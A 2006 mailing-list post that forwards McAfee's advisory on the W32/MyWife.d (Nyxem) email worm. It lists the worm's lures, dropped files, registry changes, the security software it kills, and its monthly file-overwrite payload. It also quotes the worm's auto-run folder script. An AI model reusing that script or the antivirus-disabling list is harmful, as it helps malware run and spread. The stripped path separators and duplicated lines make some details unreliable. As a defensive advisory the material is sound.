Forum Navigation
You need to log in to create posts and topics.
VIRUS ALERT FROM HOPE4KYIV
#1 · February 2, 2006, 11:05 am
Posted by: lifeunlimited <lifeunlimited@...>
Friends of "Hope4Kyiv":
In case you have not yet been alerted to a potentially destructive computer virus that is programmed to engage on February 3rd, and the 3rd of every month subsequently, I'm sending this warning from McAfee Security Center. I've also received similar information from other sources including Zone Alarm, which gives it a high rating instead of low as McAfee does.
As I understand it, this virus is programmed to essentially destroy most or all of the Microsoft Office software files (Word, Excel, PowerPoint, etc.)
If you do not have proper protection, you need to get it immediately. And, it has been recommended that you not only do a virus scan on your computer, but even do searches for files that end with the strings that are noted below.
There is lots of information here that I personally don't understand, but the important thing is to scan, and update your anti-virus program immediately.
In His Bond, By His Grace, and For His Kingdom,
Bob Tolliver
------------------------------------------------
Virus Profile: W32/MyWife.d@MM!M24
|
Risk Assessment
|
|
|
- Home Users:
|
Low
|
|
- Corporate Users:
|
Low
|
|
Date Discovered:
|
1/17/2006
|
|
Date Added:
|
1/17/2006
|
|
Origin:
|
Unknown
|
|
Length:
|
Varies
|
|
Type:
|
Virus
|
|
SubType:
|
E-mail
|
|
DAT Required:
|
4642
|
Virus Characteristics
-- Update Feb 2, 2006 --
CME number assigned ( CME-24 )
CME number assigned ( CME-24 )
This worm is proactively detected by 4642 and higher DATs as W32/Generic.worm!p2p. 4677 and higher DATs will detect this specifically as W32/MyWife.d@MM
This is a mass-mailing worm that bears the following characteristics:
contains its own SMTP engine to construct outgoing messages
spreads through open network shares
tries to lower security settings and disable security software
overwrites files on the 3rd of each month
E-mail Component:
The virus arrives in an email message as follows:
From: (Spoofed email sender)
Do not assume that the sender address is an indication that the sender is infected. Additionally you may receive alert messages from a mail server that you are infected, which may not be the case.
Subject: (Varies, such as)
Photos
My photos
School girl fantasies gone bad
Part 1 of 6 Video clipe
*Hot Movie*
Re:
Fw: Picturs
Fw: Funny 🙂
Fwd: Photo
Fwd: image.jpg
Fw: Sexy
Fw:
Fwd: Crazy illegal Sex!
Fw: Real show
Fw: SeX.mpg
Fw: DSC-00465.jpg
Re: Sex Video
Word file
the file
eBook.pdf
Miss Lebanon 2006
A Great Video
give me a kiss
Body: (Varies, such as)
Note: forwarded message attached.
You Must View This Videoclip!
>> forwarded message
i just any one see my photos.
forwarded message attached.
Please see the file.
----- forwarded message -----
The Best Videoclip Ever
Hot XXX Yahoo Groups
F***in Kama Sutra pics
ready to be F***ED 😉
VIDEOS! FREE! (US$ 0,00)
It's Free 🙂
hello,
i send the file.
bye
hi
i send the details
i attached the details.
how are you?
What?
Thank you
i send the details.
OK ?
(N.B. *** replaces content for filtering purposes)
Attachment:
The files attached to the email may either be the executable itself or a MIME encoded file which contains the executable.
The executable filename is chosen from the following list:
04.pif
007.pif
School.pif
photo.pif
DSC-00465.Pif
Arab sex DSC-00465.jpg
image04.pif
677.pif
DSC-00465.pIf
New_Document_file.pif
eBook.PIF
document.pif
The MIME encoded files' name is chosen from the following list:
SeX.mim
Sex.mim
WinZip.BHX
3.92315089702606E02.UUE
Attachments[001].B64
eBook.Uu
Word_Document.hqx
Word_Document.uu
Attachments00.HQX
Attachments001.BHX
Video_part.mim
It may also be chosen from the following list of prefaces:
392315089702606E-02
Clipe
Miss
Sweet_09
with the following file extensions:
.mim
.HQX
.BHx
.b64
.uu
.UUE
The filename within the MIME encoded file is chosen from the following list:
Attachments[001],B64 .sCr
392315089702606E-02,UUE .scR
SeX,zip .scR
WinZip.zip .sCR
ATT01.zip .sCR
Word.zip .sCR
Word XP.zip .sCR
New Video,zip .sCr
Atta[001],zip .SCR
Attachments,zip .SCR
Clipe,zip .sCr
WinZip,zip .scR
Adults_9,zip .sCR
Photos,zip .sCR
When this file is run, it copies itself to the Windows System directory as one or more of the following filenames.
%SysDir% Winzip.exe
%SysDir% Update.exe
%SysDir% scanregw.exe
%WinDir% Rundll16.exe
%WinDir% winzip_tmp.exe
c:winzip_tmp.exe
%Temp% word.zip .exe
(Where %Sysdir% is the Windows System directory - for example C:WINDOWSSYSTEM - %WinDir% is the Windows Directory, and %Temp% is the Temp Directory)
It creates the following registry entry to hook Windows startup:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionRunScanRegistry="scanregw.exe /scan"
CurrentVersionRunScanRegistry="scanregw.exe /scan"
Network Share Component:
The worm will attempt to copy itself to the following shares, using the current user's authentication:
C$documents and settingsall usersstart menuprogramsstartupwinzip quick pick.exe
Admin$winzip_tmp.exe
C$winzip_tmp.exe
The worm creates scheduled tasks on the remote computer to run winzip_tmp.exe during the 59th minute of every hour. Once the 59th minute is reached, the remote computer would itself be infected as it runs the dropped payload.
Indications of Infection
Security Settings Modification:
The following registry keys are modified to lower security settings:
HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainNotifyDownloadComplete="7562617"
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionInternet SettingsZoneMapUNCAsIntranet="1"
CurrentVersionInternet SettingsZoneMapUNCAsIntranet="1"
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionInternet SettingsZoneMapProxyBypass="1"
CurrentVersionInternet SettingsZoneMapProxyBypass="1"
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionInternet SettingsZoneMapIntranetName="1"
CurrentVersionInternet SettingsZoneMapIntranetName="1"
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentversionExplorerAdvancedWebView="0"
CurrentversionExplorerAdvancedWebView="0"
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentversionExplorerAdvancedShowSuperHidden="0"
CurrentversionExplorerAdvancedShowSuperHidden="0"
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionExplorerCabinetStateFullPath="0"
CurrentVersionExplorerCabinetStateFullPath="0"
Registry entries under the following key are modified to disable security software:
SOFTWAREClassesLicenses
.EXE or .PPL Files found within the folders listed for the following registry entries are deleted:
HKEY_LOCAL_MACHINESoftwareINTELLANDesk
VirusProtect6CurrentVersion
VirusProtect6CurrentVersion
HKEY_LOCAL_MACHINESoftwareSymantecInstalledApps
HKEY_LOCAL_MACHINESoftwareKasperskyLabComponents
101
101
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionUninstallPanda Antivirus 6.0 Platinum
CurrentVersionUninstallPanda Antivirus 6.0 Platinum
HKEY_LOCAL_MACHINESoftwareKasperskyLab
InstalledProductsKaspersky Anti-Virus Personal
InstalledProductsKaspersky Anti-Virus Personal
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionApp PathsIface.exe
CurrentVersionApp PathsIface.exe
The worm attempts to delete the following files:
%ProgramFiles% DAP*.dll
%ProgramFiles% BearShare*.dll
%ProgramFiles% SymantecLiveUpdate*.*
%ProgramFiles% SymantecCommon FilesSymantec Shared*.*
%ProgramFiles% Norton AntiVirus*.exe
%ProgramFiles% Alwil SoftwareAvast4*.exe
%ProgramFiles% McAfee.comVSO*.exe
%ProgramFiles% McAfee.comAgent*.*
%ProgramFiles% McAfee.comshared*.*
%ProgramFiles% Trend MicroPC-cillin 2002*.exe
%ProgramFiles% Trend MicroPC-cillin 2003*.exe
%ProgramFiles% Trend MicroInternet Security*.exe
%ProgramFiles% NavNT*.exe
%ProgramFiles% Morpheus*.dll
%ProgramFiles% Kaspersky LabKaspersky Anti-Virus Personal*.ppl
%ProgramFiles% Kaspersky LabKaspersky Anti-Virus Personal*.exe
%ProgramFiles% GrisoftAVG7*.dll
%ProgramFiles% TREND MICROOfficeScan*.dll
%ProgramFiles% Trend MicroOfficeScan Client*.exe
%ProgramFiles% LimeWireLimeWire 4.2.6LimeWire.jar
It also tries to delete files from the following locations on network shares:
C$Program FilesNorton AntiVirus
C$Program FilesCommon Filessymantec shared
C$Program FilesSymantecLiveUpdate
C$Program FilesMcAfee.comVSO
C$Program FilesMcAfee.comAgent
C$Program FilesMcAfee.comshared
C$Program FilesTrend MicroPC-cillin 2002
C$Program FilesTrend MicroPC-cillin 2003
C$Program FilesTrend MicroInternet Security
C$Program FilesNavNT
C$Program FilesPanda SoftwarePanda Antivirus Platinum
C$Program FilesKaspersky LabKaspersky Anti-Virus Personal
C$Program FilesKaspersky LabKaspersky Anti-Virus Personal Pro
C$Program FilesPanda SoftwarePanda Antivirus 6.0
C$Program FilesCAeTrust EZ ArmoreTrust EZ Antivirus
It monitors the internet browser for the following strings:
YAHOO! MAIL -
@YAHOOGROUPS
BLOCKSENDER
SCRIBE
YAHOOGROUPS
TREND
PANDA
SECUR
SPAM
ANTI
CILLIN
CA.COM
AVG
GROUPS.MSN
NOMAIL.YAHOO.COM
EEYE
MICROSOFT
HOTMAIL
MSN
MYWAY
GMAIL.COM
@HOTMAIL
@HOTPOP
The worm will close applications whose title contains one of the following strings:
SYMANTEC
SCAN
KASPERSKY
VIRUS
MCAFEE
TREND MICRO
NORTON
REMOVAL
FIX
The values in the list below are deleted from Registry Run and Runservices keys, to prevent them from being restarted:
PCCIOMON.exe
pccguide.exe
Pop3trap.exe
PccPfw
tmproxy
McAfeeVirusScanService
NAV Agent
PCCClient.exe
SSDPSRV
rtvscn95
defwatch
vptray
ScanInicio
APVXDWIN
KAVPersonal50
kaspersky
TM Outbreak Agent
AVG7_Run
AVG_CC
Avgserv9.exe
AVGW
AVG7_CC
AVG7_EMC
Vet Alert
VetTray
OfficeScanNT Monitor
avast!
DownloadAccelerator
BearShare
Replicating into new directories
The worm will open the following directories
Documents and Settings
Documents and Settings%USERS%My Documents
Program Files
RECYCLER
System Volume Information
and start placing three files in each directory with the following names;
desktop.ini
Temp.Htt
WinZip_Tmp.exe (a copy of the worm)
It also changes the settings on the infected system in order to "Hide Protected operating system files"
Having desktop.ini and Temp.Htt in any folder will turn it to a HTML-browsable folder. desktop.ini will point to Temp.Htt as its template file that would run every time the folder is viewed
PersistMoniker=file://Temp.Htt
Inside Temp.Htt, there will be another call to "WinZip_Temp.exe" to activate the worm in case there is not any running thread of the malware.
<script>
objectstr="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject""
objectstr+="CODEBASE="WinZip_Tmp.exe#version=1,1,1,1">"
objectstr+="<PARAM NAME="_Version" VALUE="65536">" ="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>
objectstr="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject""
objectstr+="CODEBASE="WinZip_Tmp.exe#version=1,1,1,1">"
objectstr+="<PARAM NAME="_Version" VALUE="65536">" ="</OBJECT>"
objectstr+="<HTML><H1></H1></HTML>";
document.writeln(objectstr);
document.close();
</script>
While the worm is loaded in memory, every time explorer.exe is launched and a certain folder is viewed, these three files will be copied into that folder and the settings forced again to hide their existence.
Date Activated Payload
On the 3rd day of any month, approximately 30 minutes after an infected system is started, the worm overwrites files on local drives with the following extensions with the text "DATA Error [47 0F 94 93 F4 K5]":
DOC
XLS
MDB
MDE
PPT
PPS
ZIP
RAR
PDF
PSD
DMP
Testing confirms that this payload does not affect mapped network drives.
Infection Counter
Whenever a machine is initially infected, the worm connects to a website to increment a counter:
webstats.web.rcn.net/cgi-bin/Count.cgi [censored]
Tray Icon
The worm adds an icon in the systray, displaying the string "Update Please wait" if one of these folders have be found in %Program Files% :
Norton Antivirus
Kaspersky Lab
Panda Software
Method of Infection
This worm tries to spread via email and by copying itself to local shares.
The mailing component harvests address from the local system. Files with the following strings are targeted:
.HTM
.DBX
.EML
.MSG
.OFT
.NWS
.VCF
.MBX
.IMH
.TXT
.MSF
CONTENT.
TEMPORARY
Removal Instructions
All Users :
Use current engine and DAT files for detection and removal.
Use current engine and DAT files for detection and removal.
Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).
Aliases
CME-24, Nyxem.E (F-Secure), W32.Blackmal.E@mm (NAV), W32/Grew.A!wm (Fortinet), W32/Kapser.A@mm (F-Prot), W32/MyWife.d@MM, W32/MyWife.d@MM!M24, W32/Nyxem-D (Sophos), W32/Tearec.A.worm (Panda), Win32/Blackmal.F (Vet), WORM_GREW.A (Trend)
Variants
|
Virus Name
|
Type
|
Sub Type
|
Differences
|
 |
|||
|
Virus
|
E-mail
|
This detection was added briefly, but it has since been determined that it was in fact a corrupted W32/MyWife.d@MM. Such files will now be detected as W32/MyWife.d@MM!M24.
|
|
 |
|||
-- To unsubscribe, send ANY message to: hope4kyiv-unsubscribe@welovegod.org
